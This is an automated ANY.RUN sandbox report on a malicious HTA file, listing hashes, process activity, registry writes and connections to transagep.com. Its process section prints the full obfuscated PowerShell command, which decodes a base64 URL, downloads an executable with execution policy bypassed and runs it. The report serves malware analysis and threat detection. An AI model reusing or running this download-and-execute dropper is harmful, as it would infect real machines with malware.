analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

out-2088574123.hta

Full analysis: https://app.any.run/tasks/56257704-23f3-4723-a976-6e1f0527da4f
Verdict: Malicious activity
Analysis date: March 14, 2019, 18:27:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/html
File info: HTML document, ASCII text, with very long lines, with CRLF, LF line terminators
MD5:

55B719F0F694074190862DED6599A307

SHA1:

EF08AF5EB38EE1E0CE29FA48CF2DB017F4ACCFF5

SHA256:

FE5E398D179B5897E7F506B60BF1D63A5812E806A59B6006B2E4F6FF94401F9F

SSDEEP:

192:iNdTXYN6m0dooKgKo2yIyZ5I8W2wGjNnMIm45bFUb8vnS9toNdTXYN6m0dooKgK/:ATXq6VoTbon0n2nJnMIX1OjaTXq6VoT7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • mshta.exe (PID: 2948)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2296)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 2948)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

EXIF

HTML

ContentType: text/html; charset=utf-8
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
33
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start mshta.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2948"C:\Windows\System32\mshta.exe" "C:\Users\admin\Desktop\out-2088574123.hta"C:\Windows\System32\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2296"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null;$YaJMsdEHHfp = Get-Random -Min 3 -Max 4;$oJYEgf = ([char[]]([char]97..[char]122));$ftDdWurQJB = -join ($oJYEgf | Get-Random -Count $YaJMsdEHHfp | % {[Char]$_});$NldOonIsEzyo = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$ZLAthjhGUQ = $ftDdWurQJB + $NldOonIsEzyo;$JPdCfvkuXe=[char]0x53+[char]0x61+[char]0x4c;$xvhoXCPhzrD=[char]0x49+[char]0x45+[char]0x58;$AlHXZbJBCC=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL bfcmzsxadr $JPdCfvkuXe;$WOfUbKynuUsf=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;bfcmzsxadr ouvykgrfh $xvhoXCPhzrD;$UbERWFRsFcONPR=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|ouvykgrfh;bfcmzsxadr cvlsgrikujnxa $AlHXZbJBCC;$lvoVrSdFQRhgO = $UbERWFRsFcONPR + [char]0x5c + $ZLAthjhGUQ;;;;$rQvijoTDM = 'aHR0cDovL3RyYW5zYWdlcC5jb20vY2xhc3MvbWVrLmV4ZQ==';$rQvijoTDM=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($rQvijoTDM));$njNPJMhKy = New-Object $WOfUbKynuUsf;$mMqrtILdeWCmd = $njNPJMhKy.DownloadData($rQvijoTDM);[IO.File]::WriteAllBytes($lvoVrSdFQRhgO, $mMqrtILdeWCmd);cvlsgrikujnxa $lvoVrSdFQRhgO;;$jQxGokPPfdka = @($jZkKJFNEWw, $cEsvZfzynRxLLCD, $ojGsx, $VOioZzAaXtWGkJ);foreach($NUxLwCKn in $jQxGokPPfdka){$null = $_}""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
360
Read events
289
Write events
71
Delete events
0

Modification events

(PID) Process:(2948) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2948) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2296) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2296) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2296) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2296) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(2296) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(2296) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2296) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(2296) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
Executable files
0
Suspicious files
2
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
2296powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E0N8VWW90CTFLZWNXGX4.temp
MD5:
SHA256:
2296powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1adea9.TMPbinary
MD5:0586DB8FF5249AD980CEC7BF2CBC3708
SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2
2296powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0586DB8FF5249AD980CEC7BF2CBC3708
SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
3
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2296
powershell.exe
104.219.250.144:80
transagep.com
Namecheap, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
transagep.com
  • 104.219.250.144
suspicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info